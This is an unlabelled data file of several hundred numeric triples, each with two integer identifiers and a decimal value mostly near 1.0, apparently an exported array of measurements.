(237, 269625, 1.09669),
(237, 269626, 0.86331),
(237, 269627, 0.93331),
(237, 269628, 1.00331),
(237, 269629, 0.98),
(237, 269630, 1.19),
(237, 269631, 2.15339),
(237, 269632, 2.32339),
(237, 269633, 0.93331),
(237, 269634, 1.02669),
(237, 269635, 0.95669),
(237, 269636, 1.02669),
(237, 269687, 1.05),
(237, 269688, 0.95669),
(237, 269689, 0.91),
(237, 269690, 0.95669),
(237, 269691, 1.05),
(237, 269692, 0.98),
(237, 269693, 1.12),
(237, 269694, 0.37338),
(237, 269695, 2.00662),
(237, 269696, 2.24),
(237, 269697, 0.95669),
(238, 270964, 0.86331),
(238, 270965, 1.02669),
(238, 270966, 0.84),
(238, 270967, 1.14331),
(238, 270968, 0.88669),
(238, 270969, 1.05),
(238, 270970, 0.98),
(238, 270971, 1.05),
(238, 270972, 0.98),
(238, 270973, 0.93331),
(238, 270974, 1.16669),
(238, 270975, 0.93331),
(238, 270976, 1.16669),
(238, 270977, 0.86331),
(238, 270978, 1.07331),
(238, 270979, 1.00331),
(238, 270980, 1.21331),
(238, 270981, 0.91),
(238, 270982, 1.12),
(238, 270983, 1.00331),
(238, 270984, 0.91),
(238, 270985, 1.00331),
(238, 270986, 0.84),
(238, 270987, 0.93331),
(238, 270988, 0.91),
(238, 270989, 0.91),
(304, 270989, 0.91),
(238, 270990, 0.88669),
(238, 270991, 1.07331),
(238, 270992, 0.88669),
(238, 270993, 0.98),
(238, 270994, 1.02669),
(238, 270995, 1.09669),
(238, 270996, 0.93331),
(238, 270997, 1.02669),
(238, 270998, 0.93331),
(238, 270999, 1.05),
(238, 271000, 1.16669),
(238, 271001, 3.73324),
(238, 271002, 1.09669),
(238, 271003, 1.05),
(238, 271004, 1.02669),
(238, 271005, 1.14331),
(238, 271006, 0.98),
(238, 271007, 1.12),
(238, 271008, 0.95669),
(238, 271009, 0.98),
(238, 271010, 1.12),
(238, 271011, 0.86331),
(287, 271011, 0.86331),
(238, 271012, 1.02669),
(238, 271013, 1.00331),
(238, 271014, 1.14331),
(238, 271099, 0.91),
(238, 271100, 1.05),
(238, 271101, 0.42),
(238, 271102, 1.00331),
(238, 271103, 1.09669),
(238, 271104, 0.88669),
(238, 271105, 0.98),
(238, 271106, 0.93331),
(238, 271107, 1.02669),
(238, 271108, 0.91),
(238, 271109, 1.00331),
(238, 271110, 0.91),
(238, 271111, 1.14331),
(238, 271112, 0.93331),
(238, 271113, 1.12),
(238, 271114, 0.88669),
(238, 271115, 0.98),
(238, 271116, 0.84),
(238, 271117, 1.00331),
(238, 271118, 1.14331),
(238, 271119, 0.91),
(292, 271119, 0.91),
(238, 271120, 1.02669),
(238, 271121, 1.02669),
(238, 271122, 1.14331),
(238, 271123, 0.93331),
(238, 271124, 1.02669),
(238, 271125, 1.05),
(238, 271126, 0.86331),
(238, 271127, 0.95669),
(238, 271128, 0.86331),
(238, 271129, 1.00331),
(238, 271130, 1.00331),
(238, 271131, 0.84),
(238, 271132, 0.98),
(239, 272988, 0.98),
(239, 272989, 1.16669),
(239, 272990, 1.23669),
(239, 272991, 0.42),
(239, 272992, 0.98),
(239, 272993, 1.07331),
(239, 272994, 0.98),
(239, 272995, 1.05),
(239, 272996, 0.95669),
(239, 272997, 1.05),
(239, 272998, 0.93331),
(239, 272999, 0.98),
(239, 273000, 0.95669),
(239, 273001, 0.95669),
(239, 273002, 1.00331),
(239, 273003, 1.26),
(239, 273004, 1.05),
(239, 273005, 1.14331),
(239, 273006, 1.09669),
(239, 273007, 0.95669),
(239, 273008, 1.12),
(239, 273009, 0.91),
(239, 273010, 1.14331),
(239, 273011, 0.98),
(290, 273011, 0.98),
(239, 273012, 0.95669),
(304, 273012, 0.95669),
(239, 273013, 0.18669),
(239, 273014, 0.88669),
(239, 273015, 1.00331),
(239, 273016, 0.88669),
(239, 273017, 1.00331),
(239, 273018, 0.95669),
(239, 273019, 0.95669),
(239, 273020, 0.91),
(239, 273021, 1.02669),
(239, 273022, 0.98),
(239, 273023, 1.02669),
(305, 273023, 1.02669),
(239, 273024, 1.21331),
(239, 273025, 0.98),
(239, 273026, 1.05),
(239, 273027, 0.98),
(239, 273028, 1.07331),
(239, 273029, 0.37331),
(239, 273030, 0.98),
(239, 273031, 1.16669),
(239, 273032, 0.81669),
(239, 273033, 0.95669),
(239, 273034, 1.02669),
(239, 273035, 1.07331),
(239, 273036, 0.95669),
(239, 273037, 1.02669),
(239, 273038, 0.98),
(239, 273039, 0.98),
(239, 273040, 0.93331),
(239, 273041, 1.07331),
(239, 273042, 1.21331),
(239, 273043, 1.05),
(239, 273044, 1.16669),
(239, 273045, 0.18669),
(239, 273046, 0.86331),
(239, 273047, 0.93331),
(239, 273153, 0.14),
(239, 273154, 0.91),
(239, 273155, 0.98),
(239, 273156, 0.28),
(239, 273157, 1.00331),
(239, 273158, 1.12),
(239, 273159, 0.93331),
(239, 273160, 0.98),
(239, 273161, 0.95669),
(239, 273162, 1.05),
(239, 273163, 1.02669),
(306, 273163, 1.02669),
(239, 273164, 0.93331),
(239, 273165, 1.26),
(239, 273166, 1.02669),
(239, 273167, 1.02669),
(239, 273168, 0.51331),
(239, 273169, 1.07331),
(239, 273170, 1.16669),
(239, 273171, 1.00331),
(239, 273172, 1.00331),
(239, 273173, 1.07331),
(239, 273174, 0.91),
(239, 273175, 1.02669),
(239, 273176, 1.09669),
(239, 273177, 1.19),
(239, 273178, 1.30669),
(240, 275129, 0.37331),
(240, 275130, 0.93331),
(240, 275131, 0.98),
(240, 275132, 0.95669),
(240, 275133, 1.07331),
(240, 275134, 0.86331),
(240, 275135, 0.98),
(240, 275136, 0.86331),
(240, 275137, 0.98),
(240, 275138, 1.00331),
(240, 275139, 0.91),
(240, 275140, 1.00331),
(240, 275141, 0.91),
(240, 275142, 0.98),
(240, 275143, 0.84),
(240, 275144, 1.00331),
(240, 275145, 1.05),
(240, 275146, 1.14331),
(240, 275147, 1.09669),
(240, 275148, 1.02669),
(240, 275149, 0.88669),
(240, 275150, 0.98),
(240, 275151, 0.84),
(240, 275152, 0.98),
(240, 275153, 0.91),
(240, 275154, 1.09669),
(240, 275155, 0.93331),
(240, 275156, 1.14331),
(240, 275157, 0.95669),
(240, 275158, 0.88669),
(240, 275159, 1.12),
(240, 275160, 0.93331),
(240, 275161, 0.98),
(240, 275162, 0.91),
(240, 275163, 1.05),
(240, 275164, 1.16669),
(240, 275165, 1.02669),
(240, 275166, 1.21331),
(240, 275167, 0.95669),
(240, 275168, 0.98),
(240, 275169, 1.09669),
(240, 275170, 0.95669),
(240, 275171, 1.05),
(240, 275172, 0.91),
(240, 275173, 1.16669),
(240, 275174, 1.05),
(240, 275175, 0.98),
(240, 275176, 1.07331),
(240, 275177, 1.02669),
(240, 275178, 0.88669),
(240, 275179, 0.95669),
(240, 275180, 1.02669),
(240, 275181, 1.96),
(240, 275182, 1.05),
(240, 275183, 0.98),
(240, 275184, 1.12),
(240, 275291, 0.91),
(240, 275292, 0.98),
(240, 275293, 0.93331),
(240, 275294, 1.05),
(240, 275295, 0.88669),
(240, 275296, 1.02669),
(240, 275297, 0.88669),
(240, 275298, 1.02669),
(240, 275299, 0.86331),
(305, 275299, 0.86331),
(240, 275300, 0.91),
(240, 275301, 0.95669),
(240, 275302, 1.02669),
(240, 275303, 0.91),
(240, 275304, 1.07331),
(240, 275305, 1.05),
(240, 275306, 1.14331),
(240, 275307, 1.09669),
(240, 275308, 1.19),
(240, 275309, 1.16669),
(240, 275310, 1.23669),
(240, 275311, 1.07331),
(240, 275312, 1.16669),
(240, 275313, 1.07331),
(240, 275314, 1.16669),
(240, 275315, 0.98),
(240, 275316, 1.07331),
(240, 275317, 0.91),
(306, 275317, 0.91),
(240, 275318, 0.98),
(306, 275318, 0.98),
(240, 275319, 0.98),
(240, 275320, 0.95669),
(240, 275321, 1.05),
(240, 275322, 0.84),
(240, 275323, 0.88669),
(240, 275324, 0.95669),
(240, 275325, 0.84),
(240, 275326, 0.93331),
(240, 275327, 0.95669),
(240, 275328, 1.07331),
(240, 275329, 0.91),
(240, 275330, 1.09669),
(240, 275331, 0.28),
(240, 275332, 0.91),
(240, 275333, 0.98),
(240, 275334, 0.93331),
(240, 275335, 0.88669),
(240, 275336, 1.00331),
(240, 275337, 1.02669),
(240, 275338, 0.88669),
(240, 275339, 1.09669),
(240, 275340, 0.86331),
(240, 275341, 0.95669),
(240, 275342, 0.93331),
(240, 275343, 1.07331),
(240, 275344, 1.02669),
(240, 275345, 1.16669),
(240, 275346, 0.95669),
(240, 275347, 0.95669),
(240, 275348, 1.02669),
(240, 275349, 0.98),
(240, 275350, 1.05),
(240, 275351, 0.98),
(240, 275352, 0.98),
(240, 275353, 0.93331),
(240, 275354, 1.02669),
(240, 275355, 0.23331),
(240, 275356, 0.88669),
(240, 275357, 1.00331),
(240, 275358, 0.91),
(240, 275359, 1.05),
(241, 276858, 1.02669),
(241, 276859, 1.12),
(241, 276860, 0.86331),
(241, 276861, 1.00331),
(241, 276862, 0.91),
(241, 276863, 1.05),
(241, 276864, 1.00331),
(241, 276865, 0.91),
(241, 276866, 0.98),
(241, 276867, 7.79019),
(241, 276868, 0.95669),
(241, 276869, 0.88669),
(241, 276870, 0.98),
(241, 276871, 0.86331),
(241, 276872, 0.93331),
(241, 276873, 0.91),
(241, 276874, 0.98),
(241, 276875, 1.09669),
(241, 276876, 0.88669),
(241, 276877, 1.00331),
(241, 276952, 0.98),
(241, 276953, 1.02669),
(241, 276954, 1.00331),
(241, 276955, 1.77338),
(241, 276956, 1.96),
(241, 276957, 0.88669),
(241, 276958, 1.05),
(241, 276959, 0.93331),
(241, 276960, 1.05),
(241, 276961, 0.93331),
(241, 276962, 1.00331),
(241, 276963, 0.42),
(241, 276964, 0.98),
(241, 276965, 1.09669),
(241, 276966, 0.91),
(241, 276967, 1.00331),
(241, 276968, 0.95669),
(241, 276969, 1.07331),
(241, 276970, 1.07331),
(241, 276971, 0.84),
(241, 276972, 0.95669),
(242, 278296, 1.02669),
(242, 278297, 1.00331),
(242, 278298, 0.84),
(242, 278299, 0.93331),
(242, 278300, 1.02669),
(242, 278301, 0.95669),
(242, 278302, 1.02669),
(242, 278303, 1.14331),
(242, 278304, 1.00331),
(242, 278305, 1.07331),
(242, 278306, 0.93331),
(242, 278307, 1.02669),
(242, 278308, 0.95669),
(242, 278309, 0.95669),
(242, 278310, 1.05),
(242, 278311, 1.00331),
(242, 278312, 1.26),
(242, 278313, 1.02669),
(242, 278314, 1.07331),
(242, 278315, 1.09669),
(242, 278316, 1.16669),
(242, 278317, 0.95669),
(242, 278318, 0.88669),
(305, 278318, 0.88669),
(242, 278319, 0.95669),
(242, 278320, 0.88669),
(242, 278321, 0.95669),
(242, 278322, 0.95669),
(242, 278323, 1.05),
(242, 278324, 1.14331),
(242, 278325, 1.05),
(242, 278326, 0.42),
(242, 278327, 1.12),
(242, 278328, 1.4),
(242, 278329, 0.32669),
(242, 278330, 0.95669),
(242, 278331, 1.09669),
(242, 278332, 0.91),
(242, 278333, 1.02669),
(242, 278334, 0.98),
(242, 278335, 1.28331),
(242, 278336, 0.95669),
(242, 278337, 1.07331),
(242, 278338, 1.82),
(242, 278339, 1.14331),
(242, 278340, 1.16669),
(242, 278341, 1.91338),
(242, 278342, 1.02669),
(242, 278343, 1.05),
(242, 278344, 1.21331),
(242, 278345, 1.00331),
(242, 278346, 0.95669),
(242, 278347, 0.93331),
(242, 278348, 1.02669),
(242, 278349, 0.95669),
(242, 278350, 1.14331),
(242, 278351, 0.98),
(242, 278352, 0.98),
(242, 278353, 1.14331),
(242, 278354, 0.88669),
(242, 278355, 1.05),
(242, 278356, 0.95669),
(242, 278357, 0.88669),
(242, 278358, 1.09669),
(242, 278359, 0.91),
(242, 278360, 0.98),
(242, 278361, 0.95669),
(242, 278362, 0.86331),
(242, 278363, 1.07331),
(242, 278364, 0.88669),
(242, 278365, 1.02669),
(242, 278366, 1.02669),
(242, 278367, 0.86331),
(306, 278367, 0.86331),
(242, 278368, 1.00331),
(242, 278369, 0.95669),
(242, 278370, 0.95669),
(242, 278371, 0.93331),
(242, 278372, 1.12),
(242, 278373, 0.98),
(242, 278374, 1.09669),
(242, 278375, 0.46669),
(242, 278376, 1.02669),
(242, 278377, 1.16669),
(242, 278520, 0.91),
(242, 278521, 1.00331),
(242, 278522, 1.00331),
(242, 278523, 0.23331),
(242, 278524, 1.02669),
(242, 278525, 1.09669),
(242, 278526, 0.28),
(242, 278527, 1.00331),
(242, 278528, 1.12),
(242, 278529, 0.95669),
(242, 278530, 1.09669),
(242, 278531, 0.91),
(242, 278532, 0.93331),
(242, 278533, 1.02669),
(242, 278534, 0.93331),
(242, 278535, 1.05),
(242, 278536, 0.86331),
(242, 278537, 1.00331),
(242, 278538, 1.05),
(242, 278539, 1.02669),
(242, 278540, 1.19),
(242, 278541, 0.98),
(242, 278542, 0.98),
(242, 278543, 0.98),
(242, 278544, 1.02669),
(242, 278545, 1.00331),
(242, 278546, 1.05),
(242, 278547, 0.98),
(242, 278548, 1.02669),
(242, 278549, 1.02669),
(242, 278550, 1.12),
(242, 278551, 1.00331),
(242, 278552, 1.05),
(242, 278553, 9.75359),
(242, 278554, 1.05),
(242, 278555, 0.98),
(242, 278556, 1.91338),
(242, 278557, 1.07331),
(242, 278558, 1.02669),
(242, 278559, 1.02669),
(242, 278560, 1.09669),
(242, 278561, 0.98),
(242, 278562, 1.00331),
(242, 278563, 1.02669),
(242, 278564, 0.88669),
(242, 278565, 0.95669),
(242, 278566, 0.95669),
(242, 278567, 1.14331),
(242, 278568, 0.23331),
(242, 278569, 0.93331),
(242, 278570, 1.00331),
(242, 278571, 1.07331),
(242, 278572, 0.91),
(242, 278573, 1.02669),
(242, 278574, 0.86331),
(242, 278575, 0.98),
(242, 278576, 0.98),
(242, 278577, 1.05),
(242, 278578, 0.93331),
(242, 278579, 1.12),
(242, 278580, 0.98),
(242, 278581, 1.09669),
(253, 278581, 1.09669),
(242, 278582, 0.95669),
(242, 278583, 0.95669),
(242, 278584, 2.66007),
(242, 278585, 0.95669),
(242, 278586, 1.14331),
(242, 278587, 1.07331),
(242, 278588, 0.91),
(242, 278589, 0.98),
(242, 278590, 1.05),
(242, 278591, 0.86331),
(242, 278592, 0.95669),
(242, 278593, 0.86331),
(242, 278594, 1.00331),
(242, 278595, 0.18669),
(242, 278596, 0.88669),
(242, 278597, 1.05),
(242, 278598, 0.32669),
(242, 278599, 1.07331),
(242, 278600, 1.35331),
(243, 282026, 0.98),
(243, 282027, 1.02669),
(243, 282028, 1.05),
(243, 282029, 1.14331),
(243, 282030, 0.93331),
(243, 282031, 1.07331),
(243, 282032, 0.93331),
(243, 282033, 0.98),
(243, 282034, 0.88669),
(243, 282035, 1.00331),
(243, 282036, 0.93331),
(243, 282037, 1.05),
(243, 282038, 0.93331),
(243, 282039, 1.12),
(243, 282040, 1.02669),
(243, 282041, 1.21331),
(243, 282042, 1.05),
(243, 282043, 1.16669),
(243, 282044, 0.95669),
(243, 282045, 1.16669),
(243, 282046, 1.09669),
(243, 282047, 1.05),
(243, 282048, 1.00331),
(243, 282049, 0.91),
(243, 282050, 1.02669),
(243, 282051, 0.91),
(243, 282052, 0.95669),
(243, 282053, 0.95669),
(243, 282054, 1.16669),
(243, 282055, 1.00331),
(243, 282056, 1.12),
(243, 282057, 1.00331),
(243, 282058, 0.88669),
(243, 282059, 0.98),
(243, 282060, 0.88669),
(243, 282061, 0.98),
(243, 282062, 0.91),
(243, 282063, 0.98),
(243, 282064, 0.91),
(243, 282065, 1.16669),
(243, 282066, 0.88669),
(243, 282067, 1.02669),
(243, 282068, 0.91),
(243, 282069, 0.98),
(243, 282070, 0.93331),
(243, 282071, 1.05),
(243, 282072, 0.88669),
(243, 282073, 1.00331),
(243, 282074, 0.95669),
(243, 282075, 1.00331),
(243, 282076, 0.95669),
(243, 282077, 0.95669),
(243, 282078, 1.07331),
(243, 282079, 0.91),
(243, 282080, 0.98),
(243, 282081, 0.18669),
(287, 282081, 0.18669),
(306, 282081, 0.18669),
(243, 282082, 0.86331),
(243, 282083, 1.12),
(243, 282084, 0.95669),
(243, 282085, 0.95669),
(243, 282086, 1.02669),
(243, 282184, 0.86331),
(243, 282185, 0.93331),
(243, 282186, 1.11993),
(243, 282187, 1.14331),
(243, 282188, 1.26),
(243, 282189, 0.95669),
(243, 282190, 1.00331),
(243, 282191, 1.00331),
(243, 282192, 1.28331),
(243, 282193, 1.02669),
(243, 282194, 0.98),
(243, 282195, 1.12),
(243, 282196, 0.91),
(243, 282197, 1.00331),
(243, 282198, 0.86331),
(305, 282198, 0.86331),
(243, 282199, 0.98),
(243, 282200, 0.93331),
(243, 282201, 0.98),
(243, 282202, 1.02669),
(243, 282203, 1.09669),
(243, 282204, 2.1),
(243, 282205, 2.28662),
(243, 282206, 1.05),
(243, 282207, 0.93331),
(243, 282208, 1.05),
(243, 282209, 0.88669),
(243, 282210, 1.00331),
(243, 282211, 0.93331),
(243, 282212, 1.07331),
(243, 282213, 0.23331),
(243, 282214, 0.98),
(243, 282215, 1.19),
(243, 282216, 0.84),
(243, 282217, 0.95669),
(243, 282218, 0.98),
(243, 282219, 1.09669),
(243, 282220, 0.91),
(243, 282221, 1.02669),
(243, 282222, 0.86331),
(243, 282223, 0.98),
(243, 282224, 1.00331),
(243, 282225, 1.12),
(243, 282226, 0.91),
(243, 282227, 1.05),
(243, 282228, 0.84),
(243, 282229, 0.98),
(243, 282230, 1.00331),
(243, 282231, 1.12),
(243, 282232, 0.98),
(243, 282233, 1.14331),
(243, 282234, 0.98),
(243, 282235, 1.19),
(244, 283959, 0.93331),
(244, 283960, 1.00331),
(244, 283961, 0.88669),
(244, 283962, 0.95669),
(244, 283963, 0.86331),
(244, 283964, 1.09669),
(244, 283965, 0.95669),
(244, 283966, 1.02669),
(244, 283967, 0.98),
(306, 283967, 1.96),
(244, 283968, 1.00331),
(244, 283969, 1.21331),
(244, 283970, 0.95669),
(244, 283971, 1.07331),
(244, 283972, 1.12),
(244, 283973, 1.00331),
(244, 283974, 1.07331),
(244, 283975, 0.81669),
(244, 283976, 0.93331),
(244, 283977, 0.86331),
(244, 283978, 0.93331),
(244, 283979, 0.95669),
(244, 283980, 0.88669),
(244, 283981, 1.00331),
(244, 283982, 0.84),
(244, 283983, 0.91),
(244, 283984, 0.86331),
(244, 283985, 1.02669),
(244, 283986, 0.98),
(244, 283987, 1.00331),
(244, 283988, 0.86331),
(244, 283989, 0.95669),
(244, 283990, 0.91),
(244, 283991, 1.09669),
(244, 283992, 0.98),
(244, 283993, 1.05),
(244, 283994, 0.93331),
(244, 283995, 1.07331),
(244, 283996, 0.95669),
(244, 283997, 1.14331),
(244, 283998, 2.66007),
(244, 283999, 1.91338),
(244, 284000, 1.02669),
(244, 284001, 0.91),
(244, 284002, 1.00331),
(244, 284003, 0.95669),
(244, 284004, 0.91),
(244, 284005, 1.00331),
(244, 284006, 0.88669),
(244, 284007, 0.95669),
(244, 284008, 1.00331),
(244, 284009, 0.91),
(244, 284010, 1.02669),
(244, 284011, 0.84),
(244, 284012, 0.91),
(244, 284013, 0.88669),
(244, 284014, 0.98),
(244, 284015, 0.88669),
(244, 284016, 1.00331),
(244, 284017, 0.91),
(244, 284018, 0.98),
(244, 284019, 1.00331),
(244, 284020, 0.98),
(244, 284021, 0.95669),
(244, 284022, 0.98),
(244, 284023, 0.91),
(244, 284024, 0.98),
(244, 284025, 1.00331),
(244, 284026, 0.88669),
(244, 284027, 1.09669),
(244, 284028, 1.02669),
(244, 284029, 1.33),
(244, 284030, 0.98),
(244, 284031, 1.09669),
(244, 284032, 0.91),
(244, 284033, 1.02669),
(244, 284034, 1.00331),
(244, 284035, 1.07331),
(244, 284036, 1.07331),
(244, 284037, 1.21331),
(244, 284038, 1.00331),
(244, 284039, 1.00331),
(244, 284040, 1.14331),
(244, 284041, 0.84),
(290, 284041, 0.84),
(244, 284042, 0.91),
(244, 284093, 0.88669),
(244, 284094, 0.95669),
(244, 284095, 0.93331),
(244, 284096, 1.00331),
(244, 284097, 0.98),
(244, 284098, 0.95669),
(244, 284099, 1.09669),
(244, 284100, 0.91),
(244, 284101, 0.98),
(244, 284102, 0.37331),
(244, 284103, 1.09669),
(244, 284104, 1.16669),
(244, 284105, 0.91),
(244, 284106, 1.00331),
(244, 284107, 0.37331),
(244, 284108, 1.05),
(244, 284109, 1.12),
(244, 284110, 0.88669),
(244, 284111, 0.98),
(244, 284112, 0.91),
(244, 284113, 1.02669),
(245, 284878, 1.07331),
(245, 284879, 1.30669),
(245, 284880, 0.88669),
(245, 284881, 1.00331),
(245, 284882, 0.91),
(245, 284883, 1.12),
(245, 284884, 1.07331),
(245, 284885, 1.16669),
(245, 284886, 1.02669),
(245, 284931, 1.77338),
(245, 284932, 1.07331),
(245, 284933, 1.00331),
(245, 284934, 0.91),
(245, 284935, 1.02669),
(245, 284936, 0.18669),
(245, 284937, 0.98),
(245, 284938, 1.07331),
(245, 284939, 0.88669),
(245, 284940, 1.00331),
(245, 284941, 0.93331),
(245, 284942, 1.02669),
(245, 284943, 0.65338),
(245, 284944, 0.93331),
(245, 284945, 1.07331),
(245, 284946, 0.93331),
(245, 284947, 1.12),
(246, 285530, 0.93331),
(246, 285531, 1.02669),
(246, 285532, 0.98),
(246, 285533, 1.12),
(246, 285534, 0.93331),
(246, 285535, 0.98),
(246, 285536, 0.93331),
(246, 285537, 1.07331),
(246, 285538, 1.05),
(246, 285539, 0.88669),
(246, 285540, 1.02669),
(246, 285541, 0.93331),
(306, 285541, 0.93331),
(246, 285542, 0.81669),
(246, 285543, 0.86331),
(246, 285544, 0.28),
(246, 285545, 0.98),
(246, 285546, 1.07331),
(246, 285547, 1.00331),
(246, 285548, 1.23669),
(246, 285549, 0.93331),
(246, 285550, 1.02669),
(246, 285551, 0.23331),
(246, 285552, 0.91),
(246, 285553, 0.98),
(246, 285554, 0.98),
(246, 285555, 1.09669),
(246, 285556, 1.02669),
(246, 285557, 1.14331),
(246, 285558, 0.88669),
(246, 285559, 0.98),
(246, 285560, 0.28),
(246, 285561, 1.00331),
(246, 285562, 1.07331),
(246, 285563, 0.88669),
(246, 285564, 1.02669),
(246, 285565, 0.93331),
(246, 285625, 0.28),
(246, 285626, 1.02669),
(246, 285627, 1.19),
(246, 285628, 0.28),
(304, 285628, 0.56),
(246, 285629, 0.93331),
(246, 285630, 1.02669),
(246, 285631, 1.00331),
(246, 285632, 1.16669),
(246, 285633, 1.02669),
(246, 285634, 0.98),
(246, 285635, 0.28),
(246, 285636, 0.93331),
(246, 285637, 1.16669),
(246, 285638, 0.23331),
(246, 285639, 0.95669),
(246, 285640, 1.02669),
(246, 285641, 0.23331),
(246, 285642, 0.88669),
(246, 285643, 1.00331),
(246, 285644, 0.18669),
(246, 285645, 0.86331),
(246, 285646, 0.95669),
(246, 285647, 0.18669),
(246, 285648, 0.93331),
(246, 285649, 1.02669),
(247, 286545, 0.93331),
(247, 286546, 1.12),
(247, 286547, 5.32014),
(247, 286548, 1.02669),
(247, 286549, 5.01655),
(247, 286550, 0.95669),
(247, 286551, 1.09669),
(247, 286552, 0.81669),
(305, 286552, 0.81669),
(247, 286553, 0.88669),
(247, 286554, 0.95669),
(247, 286555, 1.05),
(247, 286556, 0.98),
(247, 286557, 1.02669),
(247, 286558, 0.91),
(247, 286599, 0.18669),
(247, 286600, 0.86331),
(247, 286601, 1.05),
(247, 286602, 1.02669),
(247, 286603, 0.86331),
(247, 286604, 1.09669),
(247, 286605, 0.86331),
(247, 286606, 0.95669),
(247, 286607, 0.95669),
(247, 286608, 0.91),
(247, 286609, 1.00331),
(247, 286610, 1.09669),
(247, 286611, 0.84),
(247, 286612, 0.91),
(248, 287488, 0.95669),
(248, 287489, 1.02669),
(248, 287490, 1.00331),
(248, 287491, 0.91),
(248, 287492, 1.07331),
(248, 287493, 0.95669),
(248, 287494, 0.91),
(248, 287495, 1.00331),
(248, 287496, 1.00331),
(248, 287497, 1.16669),
(248, 287498, 1.05),
(248, 287499, 0.95669),
(248, 287500, 1.02669),
(248, 287501, 1.14331),
(248, 287545, 0.42),
(306, 287545, 0.42),
(248, 287546, 1.02669),
(248, 287547, 1.09669),
(248, 287548, 0.91),
(248, 287549, 1.12),
(248, 287550, 0.91),
(248, 287551, 1.00331),
(248, 287552, 1.09669),
(248, 287553, 1.07331),
(248, 287554, 0.95669),
(248, 287555, 0.95669),
(248, 287556, 1.09669),
(248, 287557, 0.86331),
(248, 287558, 1.05),
(248, 287559, 0.23331),
(248, 287560, 0.95669),
(248, 287561, 1.09669),
(248, 287562, 1.02669),
(248, 287563, 1.28331),
(248, 287564, 1.05),
(248, 287565, 0.28),
(305, 287565, 0.28),
(248, 287566, 1.05),
(248, 287567, 1.12),
(249, 288565, 1.00331),
(249, 288566, 1.05),
(249, 288567, 0.95669),
(249, 288568, 1.00331),
(249, 288569, 0.98),
(249, 288570, 1.12),
(249, 288571, 0.86331),
(249, 288572, 0.93331),
(249, 288573, 0.95669),
(249, 288574, 1.07331),
(249, 288575, 0.98),
(249, 288576, 0.98),
(249, 288577, 1.02669),
(249, 288578, 0.91),
(249, 288579, 0.95669),
(249, 288580, 1.05),
(249, 288581, 1.00331),
(249, 288582, 1.19),
(249, 288583, 1.09669),
(249, 288584, 1.02669),
(249, 288585, 0.95669),
(249, 288586, 1.12),
(249, 288587, 0.88669),
(249, 288588, 1.02669),
(249, 288589, 0.42),
(249, 288590, 1.00331),
(249, 288591, 1.12),
(249, 288618, 1.02669),
(249, 288619, 1.12),
(249, 288620, 1.00331),
(249, 288621, 0.88669),
(249, 288622, 0.98),
(249, 288623, 1.09669),
(249, 288624, 0.95669),
(249, 288625, 1.02669),
(249, 288626, 0.91),
(249, 288627, 1.02669),
(249, 288628, 0.18669),
(249, 288629, 0.86331),
(249, 288630, 1.00331),
(250, 289364, 0.09331),
(250, 289365, 0.91),
(250, 289366, 1.00331),
(251, 289420, 0.28),
(251, 289421, 0.93331),
(251, 289422, 1.09669),
(251, 289427, 7.41),
(251, 289428, 8.36019),
(251, 289429, 7.41),
(252, 289703, 1.00331),
(252, 289704, 1.00331),
(252, 289705, 1.02669),
(252, 289706, 0.91),
(252, 289707, 0.98),
(252, 289708, 1.05),
(252, 289709, 1.26),
(252, 289710, 0.98),
(252, 289711, 1.09669),
(252, 289712, 1.00331),
(252, 289713, 1.91338),
(252, 289714, 2.1),
(252, 289715, 0.93331),
(252, 289716, 1.00331),
(252, 289717, 0.95669),
(252, 289718, 1.07331),
(252, 289719, 1.02669),
(252, 289720, 1.23669),
(252, 289721, 1.19),
(252, 289780, 0.56),
(252, 289781, 1.19),
(252, 289782, 1.28331),
(252, 289783, 0.93331),
(252, 289784, 1.05),
(252, 289785, 0.88669),
(252, 289786, 0.98),
(252, 289787, 3.00993),
(252, 289788, 1.12),
(252, 289789, 1.12),
(252, 289790, 1.21331),
(252, 289791, 1.21338),
(252, 289792, 1.09669),
(252, 289793, 1.33),
(252, 289794, 1.12),
(252, 289795, 1.28331),
(252, 289796, 0.86331),
(306, 289796, 0.86331),
(252, 289797, 0.91),
(253, 290762, 0.93331),
(253, 290763, 1.02669),
(253, 290764, 0.37331),
(253, 290765, 0.95669),
(253, 290766, 1.21331),
(253, 290767, 0.93331),
(253, 290768, 0.98),
(253, 290769, 0.93331),
(253, 290770, 1.07331),
(253, 290771, 0.88669),
(292, 290771, 0.88669),
(253, 290772, 1.77338),
(253, 290773, 0.98),
(253, 290774, 0.95669),
(253, 290775, 0.93331),
(253, 290776, 1.12),
(253, 290777, 1.09669),
(253, 290778, 1.05),
(253, 290779, 0.88669),
(253, 290780, 1.05),
(253, 290781, 0.91),
(253, 290782, 1.05),
(253, 290783, 0.88669),
(253, 290784, 0.98),
(253, 290785, 0.88669),
(253, 290786, 0.95669),
(253, 290787, 0.93331),
(253, 290788, 1.12),
(253, 290789, 1.86662),
(253, 290790, 1.00331),
(253, 290791, 1.02669),
(253, 290792, 4.55),
(253, 290793, 1.00331),
(253, 290794, 1.05),
(253, 290795, 1.02669),
(253, 290796, 1.05),
(253, 290797, 1.07331),
(253, 290798, 1.82),
(253, 290799, 2.14662),
(253, 290800, 0.93331),
(253, 290801, 1.00331),
(253, 290802, 1.00331),
(253, 290803, 1.07331),
(253, 290860, 0.98),
(253, 290861, 1.09669),
(253, 290862, 0.18669),
(306, 290862, 0.18669),
(253, 290863, 0.93331),
(253, 290864, 1.05),
(253, 290865, 0.93331),
(292, 290865, 0.93331),
(253, 290866, 1.09669),
(253, 290867, 0.93331),
(253, 290868, 1.07331),
(253, 290869, 1.12),
(253, 290870, 0.88669),
(253, 290871, 1.02669),
(253, 290872, 2.66007),
(253, 290873, 3.08007),
(253, 290874, 0.93331),
(253, 290875, 1.09669),
(253, 290876, 0.32669),
(253, 290877, 0.98),
(253, 290878, 1.07331),
(253, 290879, 0.98),
(253, 290880, 0.95669),
(253, 290881, 0.95669),
(253, 290882, 1.09669),
(253, 290883, 1.00331),
(253, 290884, 0.51331),
(253, 290885, 1.00331),
(253, 290886, 1.14331),
(253, 290887, 0.28),
(253, 290888, 0.93331),
(253, 290889, 1.05),
(253, 290890, 0.65338),
(253, 290891, 0.93331),
(253, 290892, 1.12),
(253, 290893, 0.98),
(253, 290894, 1.07331),
(253, 290895, 0.18669),
(253, 290896, 0.88669),
(253, 290897, 0.98),
(254, 291950, 1.00331),
(254, 291951, 0.98),
(254, 291952, 1.00331),
(254, 291953, 1.16669),
(254, 291954, 0.98),
(254, 291955, 1.09669),
(254, 291956, 0.98),
(292, 291957, 0.98),
(254, 291957, 1.96),
(254, 291958, 0.88669),
(254, 291959, 1.00331),
(254, 291960, 2.15339),
